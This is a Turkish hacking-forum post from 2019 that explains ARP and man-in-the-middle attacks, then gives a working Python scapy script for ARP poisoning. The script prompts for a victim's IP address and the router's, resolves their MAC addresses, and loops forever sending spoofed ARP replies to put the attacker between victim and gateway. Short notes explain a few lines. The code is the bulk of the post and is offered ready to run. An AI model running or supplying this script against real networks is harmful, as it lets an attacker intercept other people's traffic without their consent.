THT DUYURU

chat
Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

takipci
chat
Seçenekler

MITM (Man in the middle) Attack

Zilla - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
09/2016
Mesajlar:
6.490
Konular:
292
Teşekkür (Etti):
1026
Teşekkür (Aldı):
1631
Ticaret:
(0) %
0
2641
28-03-2019 19:33
#1
MITM (Man in the middle) Attack
ARP (Address Resolution Protocol) nedir?

Local Area Networkde (LAN) Internet Protocol (IP) adresi bilinen cihazın Media Access Control (MAC) adresini bulan bi' protokoldür. Genellikle OSI modelinde 2. sıradadır.



IP-MAC eşleşmesi için komut satırına veya terminale arp -a yazarak sonuçlara bakabilirsiniz.



Görüldüğü üzere 192.168.1.35 IP adresli cihaz benim telefonum, 192.168.1.33 IP adresli cihaz benim bilgisayarım. Karşılarında da MAC adresleri gözükmekte.

MITM (Man In The Middle) nedir?

MITM, cihaz ile gateway arasındaki yolu zehirler, gateway ve cihaz arasındaki istekleri attackera yönlendirir.



Bunu daha iyi açıklamak için scapy kütüphanesi ile bi' tane Python exploiti yazalım. Şimdi ilk ARP request ile MAC adreslerini öğreneceğiz, sonra ARP reply ile poisoning işlemini başlatacağız.

Kod:
#Turkhackteam.org 

from scapy.all import * 
 
def getMacAddress(IPAddress):
    ans,unans = srp(Ether(dst="FF:FF:FF:FF:FF:FF")/ARP(pdst=IPAddress),timeout=1,retry=1)
    for k,j in ans:
        return j[ARP].hwsrc
    exit(4)
    
            
def manInTheMiddleAttack(VictimIPAddress,VictimMacAddress,RouterIPAddress,RouterMacAddress,HackerMacAddress):    
    while 1:    
        send(ARP(op=2,psrc=VictimIPAddress,pdst=RouterIPAddress,hwdst=RouterMacAddress,hwsrc=HackerMacAddress))
        send(ARP(op=2,psrc=RouterIPAddress,pdst=VictimIPAddress,hwdst=VictimMacAddress,hwsrc=HackerMacAddress))
        
VIA = str(input("Saldırılacak kişinin IP adresi: "))
VMA = getMacAddress(VIA)
########################
RIA = str(input("Routerınızın IP adresi: "))
RMA = getMacAddress(RIA)
########################
HIA = str(input("IP adresiniz: "))
HMA = getMacAddress(HIA)

thread = Thread(target=manInTheMiddleAttack,args=(VIA,VMA,RIA,RMA,HMA))
thread.start()

Burada yaptığımız işlem kendimi routera mobil cihaz olarak göstermek ve kendimi mobil cihaza router olarak göstermek.

srp() -> Bunu response alacağımız için kullandık.
--- k Destination, j ise Sourcedür.
exit(4) -> Genelde network hataları olduğunda 4 numarasıyla çıkıldığı için 4 yazdım.
send() -> Paket göndermeye yarar.

Yararlanılan kaynaklar -> https://scapy.readthedocs.io/en/latest/
Konu Zilla tarafından (28-03-2019 19:45 Saat 19:45 ) değiştirilmiştir.
Barrier Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler